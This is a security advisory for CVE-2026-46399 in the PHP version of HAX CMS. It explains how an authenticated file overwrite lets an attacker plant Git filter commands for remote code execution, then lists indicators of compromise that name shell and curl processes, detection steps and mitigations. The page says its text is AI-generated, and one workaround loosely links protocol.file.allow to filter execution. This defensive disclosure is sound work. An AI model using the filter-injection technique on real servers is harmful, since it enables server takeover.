CVE-2026-46399 Overview
CVE-2026-46399 is an authenticated file overwrite vulnerability in HAX CMS, an open-source platform that manages microsite networks using PHP or Node.js backends. The flaw affects the PHP version of HAX CMS prior to release 26.0.0. An authenticated attacker can overwrite files used by Git, configure malicious Git filter commands, and trigger code execution on the HAX CMS server. The issue is tracked under [CWE-15] (External Control of System or Configuration Setting) and was published to the National Vulnerability Database (NVD) on June 5, 2026. Version 26.0.0 patches the vulnerability.
Critical Impact
Authenticated attackers can achieve remote code execution on HAX CMS PHP servers by abusing Git filter configuration through file overwrite.
Affected Products
- HAX CMS (PHP backend) versions prior to 26.0.0
- HAX CMS deployments using Git-backed microsite storage
- Self-hosted HAX CMS PHP instances exposed to authenticated users
Discovery Timeline
- 2026-06-05 - CVE-2026-46399 published to NVD
- 2026-06-08 - Last updated in NVD database
Technical Details for CVE-2026-46399
Vulnerability Analysis
The vulnerability resides in the PHP backend of HAX CMS, which uses Git to manage microsite content. An authenticated user can overwrite files within Git-controlled directories. By overwriting a Git configuration file, the attacker can register a malicious Git filter command. When HAX CMS subsequently invokes Git operations on the affected repository, Git executes the attacker-controlled filter, resulting in arbitrary command execution under the privileges of the HAX CMS service account.
This is a server-side execution flaw. It does not require user interaction beyond authentication, and the attack is performed over the network against the HAX CMS web interface.
Root Cause
The root cause is improper restriction of file write operations against sensitive Git metadata. HAX CMS does not adequately validate destination paths or filter the configuration keys an authenticated user can influence. This permits modification of Git settings such as filter.<driver>.clean and filter.<driver>.smudge, which Git treats as executable commands during repository operations.
Attack Vector
An authenticated attacker submits a request that overwrites a Git configuration file within a HAX CMS repository. The attacker injects a filter driver definition pointing to an arbitrary shell command. The next Git operation invoked by HAX CMS, such as a checkout or add, triggers the configured filter and executes the attacker's command on the server. Refer to the GitHub Security Advisory GHSA-q759-vxg8-vq5j for additional technical detail.
Detection Methods for CVE-2026-46399
Indicators of Compromise
- Unexpected modifications to .git/config or .gitattributes files within HAX CMS-managed repositories
- Presence of filter.*.clean or filter.*.smudge entries referencing shell utilities, scripts, or network commands
- Web server processes spawning child processes such as sh, bash, python, or curl during HAX CMS Git operations
- Outbound network connections from the HAX CMS host to unfamiliar destinations following authenticated user activity
Detection Strategies
- Monitor file integrity on .git/ directories under HAX CMS content paths and alert on unauthorized changes
- Audit HAX CMS application logs for file write or save operations targeting paths outside expected content directories
- Correlate authenticated session activity with process execution events on the underlying host
Monitoring Recommendations
- Log all HAX CMS API requests that perform file writes and review them for path traversal patterns
- Capture process creation telemetry from the web server user and flag Git-spawned shell processes
- Track the version string of deployed HAX CMS instances and alert on any running version below 26.0.0
How to Mitigate CVE-2026-46399
Immediate Actions Required
- Upgrade all HAX CMS PHP deployments to version 26.0.0 or later without delay
- Audit existing repositories for malicious entries in .git/config and .gitattributes and remove any unauthorized filter definitions
- Rotate credentials and review user accounts on HAX CMS instances that may have been exposed
Patch Information
The vendor released HAX CMS version 26.0.0, which remediates the file overwrite condition that enabled Git filter abuse. Full remediation details are available in the HAX CMS GitHub Security Advisory GHSA-q759-vxg8-vq5j.
Workarounds
- Restrict access to authenticated HAX CMS interfaces to trusted users only until the upgrade is complete
- Run HAX CMS under a low-privilege service account that cannot modify system binaries or write outside the application directory
- Configure Git globally with git config --global protocol.file.allow user and disable filter execution where feasible by reviewing core.hooksPath and filter drivers
# Verify HAX CMS version and inspect Git configuration for malicious filters
grep -R "filter\." /path/to/hax-cms/sites/*/.git/config
find /path/to/hax-cms/sites -name ".gitattributes" -exec cat {} \;
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
